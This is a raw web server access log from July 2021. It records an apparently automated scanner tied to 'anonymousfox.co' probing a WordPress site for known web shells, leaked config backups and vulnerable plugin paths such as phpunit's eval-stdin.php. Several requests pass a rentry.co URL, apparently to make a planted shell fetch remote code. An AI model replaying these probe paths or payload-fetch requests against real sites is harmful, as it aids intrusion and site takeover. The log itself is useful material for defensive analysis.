195.133.40.19 - - [20/Jul/2021:12:00:16 -0400] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 301 563 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:00:36 -0400] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 301 5188 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:00:53 -0400] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 44005 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:01:23 -0400] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 5180 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:01:47 -0400] "GET /wp-includes/css/wp-config.php HTTP/1.1" 404 43993 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:02:15 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 555 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:02:22 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 5180 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:02:30 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 43996 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:02:57 -0400] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 301 567 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:03:10 -0400] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 301 5192 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:03:30 -0400] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 44008 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:04:11 -0400] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 301 581 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:04:21 -0400] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 301 5206 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:04:26 -0400] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 44032 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:04:46 -0400] "GET /haders.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:05:00 -0400] "GET /haders.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:05:08 -0400] "GET /haders.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:05:41 -0400] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 301 617 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:05:49 -0400] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 301 5242 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:06:07 -0400] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 44068 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:06:51 -0400] "GET /legion.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:07:07 -0400] "GET /legion.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:07:15 -0400] "GET /legion.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:07:44 -0400] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 301 573 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:08:06 -0400] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 301 5198 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:08:25 -0400] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 44020 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:08:53 -0400] "GET /wp-includes/lfx.php HTTP/1.1" 301 535 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:09:11 -0400] "GET /wp-includes/lfx.php HTTP/1.1" 301 5160 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:09:19 -0400] "GET /wp-includes/lfx.php HTTP/1.1" 404 43960 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:09:59 -0400] "GET /wp-includes/small.php HTTP/1.1" 301 539 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:10:14 -0400] "GET /wp-includes/small.php HTTP/1.1" 301 5164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:10:21 -0400] "GET /wp-includes/small.php HTTP/1.1" 404 43966 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:11:11 -0400] "GET /up.php HTTP/1.1" 301 509 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:11:25 -0400] "GET /up.php HTTP/1.1" 301 5134 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:11:48 -0400] "GET /up.php HTTP/1.1" 404 43918 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:12:33 -0400] "GET /upload.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:12:45 -0400] "GET /upload.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:12:51 -0400] "GET /upload.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:13:05 -0400] "GET /config.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:13:20 -0400] "GET /config.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:14:01 -0400] "GET /test.php?Ghost=send HTTP/1.1" 301 535 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:14:34 -0400] "GET /wp-content/langar.php HTTP/1.1" 301 539 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:14:38 -0400] "GET /wp-content/langar.php HTTP/1.1" 301 5164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:14:54 -0400] "GET /wp-content/langar.php HTTP/1.1" 404 43966 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:15:19 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 597 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:15:25 -0400] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 301 637 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:15:34 -0400] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 301 5262 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:15:38 -0400] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 44122 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:15:57 -0400] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 301 609 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:16:08 -0400] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 301 5234 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:12:16:20 -0400] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 404 44083 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:49:46 -0400] "GET /style.php HTTP/1.1" 301 515 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:49:59 -0400] "GET /style.php HTTP/1.1" 301 5140 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:50:22 -0400] "GET /style.php HTTP/1.1" 404 43927 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:50:59 -0400] "GET /moduless.php HTTP/1.1" 301 521 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:51:13 -0400] "GET /moduless.php HTTP/1.1" 301 5146 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:51:28 -0400] "GET /moduless.php HTTP/1.1" 404 43936 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:51:47 -0400] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 301 603 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:51:54 -0400] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 301 5228 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:52:04 -0400] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 44068 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:52:39 -0400] "GET /admin.php HTTP/1.1" 301 515 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:53:14 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 527 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:53:20 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 5152 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:53:55 -0400] "GET /boom.php?x HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:54:25 -0400] "GET /boom.php?x HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:54:49 -0400] "GET /boom.php?x HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:55:39 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 567 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:55:51 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 5192 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:56:04 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 44011 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:56:42 -0400] "GET /wp-content/db_cache.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:57:10 -0400] "GET /wp-content/db_cache.php HTTP/1.1" 301 5168 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:57:21 -0400] "GET /wp-content/db_cache.php HTTP/1.1" 404 43972 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:57:52 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 599 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:58:03 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 5224 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:58:25 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 44062 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:59:04 -0400] "GET /xmlrp.php?url=https://rentry.co/yu8xc/raw HTTP/1.1" 301 579 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:59:12 -0400] "GET /xmlrp.php?url=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5204 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:17:59:33 -0400] "GET /xmlrp.php?url=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44053 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:00:30 -0400] "GET /wpindex.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 583 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:00:50 -0400] "GET /wpindex.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5208 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:01:02 -0400] "GET /wpindex.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44059 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:02:09 -0400] "GET /larva.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 579 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:02:17 -0400] "GET /larva.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5204 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:02:26 -0400] "GET /larva.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 404 43946 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:04:13 -0400] "GET /th3_err0r.php?php=https://rentry.co/yu8xc/raw HTTP/1.1" 301 587 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:04:32 -0400] "GET /th3_err0r.php?php=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5212 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:05:03 -0400] "GET /th3_err0r.php?php=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44065 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:06:50 -0400] "GET /alfindex.php HTTP/1.1" 301 521 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:06:59 -0400] "GET /alfindex.php HTTP/1.1" 301 5146 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:07:17 -0400] "GET /alfindex.php HTTP/1.1" 404 43936 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:08:07 -0400] "GET /alfa.php HTTP/1.1" 301 513 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:08:29 -0400] "GET /alfa.php HTTP/1.1" 301 5138 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:08:40 -0400] "GET /alfa.php HTTP/1.1" 404 43924 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:09:13 -0400] "GET /wp-booking.php HTTP/1.1" 301 525 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:09:44 -0400] "GET /cindex.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:09:55 -0400] "GET /cindex.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:10:11 -0400] "GET /cindex.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:10:34 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 301 551 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:10:47 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 301 5176 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
212.192.241.205 - - [20/Jul/2021:18:10:57 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 43984 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
